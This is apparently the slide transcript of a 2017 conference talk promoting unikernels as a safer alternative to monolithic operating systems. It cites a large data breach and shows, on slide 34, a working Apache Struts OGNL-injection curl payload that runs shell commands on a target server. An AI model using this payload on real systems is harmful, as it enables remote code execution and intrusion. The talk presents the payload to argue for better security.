Climbing Out From the Digital Mud with Unikernels - HL2017

Ian Eyberg
November 10, 2017

We've been accumulating digital mud for the past four decades with our software infrastructure. Unikernels offer a way forward to stop the security catastrophes and show the path forward.


Transcript

  1. Climbing Out From the Digital Mud with Unikernels Ian Eyberg

  2. THE MONOLITHIC OPERATING SYSTEM

  3. DIGITAL MUD

  4. None
  5. A Decade Of Wasted Cores

  6. LIBXML2

  7. USB DRIVERS

  8. mongodb of devops

  9. HISTORY OF SOFTWARE DEVELOPMENT OVER 4 DECADES

  10. JANUARY 1ST 1970

  11. 1980

  12. 1990

  13. 2000

  14. 2010

  15. What Is An Operating System?

  16. What is an application? 7f 45 4c 46

  17. security

  18. pagerduty alert

  19. ulimits are off??

    bash: fork: retry: Resource temporarily unavailable
    bash: fork: retry: Resource temporarily unavailable
    bash: fork: retry: Resource temporarily unavailable
    bash: fork: retry: Resource temporarily unavailable
    bash: fork: retry: Resource temporarily unavailable
    bash: fork: retry: Resource temporarily unavailable
    bash: fork: retry: Resource temporarily unavailable
    bash: fork: retry: Resource temporarily unavailable
    bash: fork: retry: Resource temporarily unavailable
    bash: fork: retry: Resource temporarily unavailable
    bash: fork: retry: Resource temporarily unavailable
    bash: fork: retry: Resource temporarily unavailable
  20. None
  21. sudo apt-get install emacs

  22. VICTORY

  23. 2 weeks later

  24. None
  25. SUDO OH-FUCKING-SHIT

  26. security pain

  27. 143M records of personal information stolen

  28. CIO, CISO, CEO “RETIRED”
  29. None
  30. MULTIPLE CONGRESSIONAL HEARINGS
  31. INSIDER TRADING INVESTIGATION
  32. DOZENS OF CLASS ACTION LAWSUITS
  33. None
  34. curl -i -s -k -X $'GET' \
    -H $'User-Agent: Mozilla/5.0' \
    -H $'Content-Type: %{(#_=\'multipart/form-data\').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess? (#_memberAccess=#dm): ((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']). (#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()). (#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))). (#cmd=\'ls -lat /\'). (#iswin=(@java.lang.System@getProperty(\'os.name\').toLowerCase().contains(\'win\'))).(#cmds=(#iswin?{\'cmd.exe\',\'/c\',#cmd}:{\'/bin/bash\',\'-c\',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)). (#p.redirectErrorStream(true)).(#process=#p.start()). (#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)). (#ros.flush())}' \
    $'https://pure.ownage'
  35. None
  36. PASSWORDS? SHELL? DB ACCESS?
  37. THE FUTURE IS UNIKERNELS
  38. None
  39. single process

  40. no users

  41. NO SHELL

  42. None
  43. OIL PLATFORM WANTS TO SECURE CONTROL DATA

  44. BIO TECH FIRM WANTS CHEAP SECURE COMPUTE

  45. NOTABLE UNIKERNEL PROJECTS

  46. None
  47. https://github.com/Solo5/solo5 unicore

  48. TEXT 2.3MS BOOT TIME sysml.neclab.eu/projects/lightvm

  49. GO GET GITHUB.COM/DEFERPANIC/VIRGO

  50. DEMO TIME

    ▸ search for existing apps
    ▸ create a new app
    ▸ show running apps
    ▸ show installed apps
    ▸ run an app
    ▸ pull project
  51. GITHUB.COM/DEFERPANIC/VIRGO

  52. GITHUB.COM/DEFERPANIC/VIRGO

  53. GITHUB.COM/DEFERPANIC/VIRGO

  54. GITHUB.COM/DEFERPANIC/VIRGO

  55. GITHUB.COM/DEFERPANIC/VIRGO

  56. GITHUB.COM/DEFERPANIC/VIRGO

  57. GITHUB.COM/DEFERPANIC/VIRGO

  58. WHAT WILL YOU BUILD?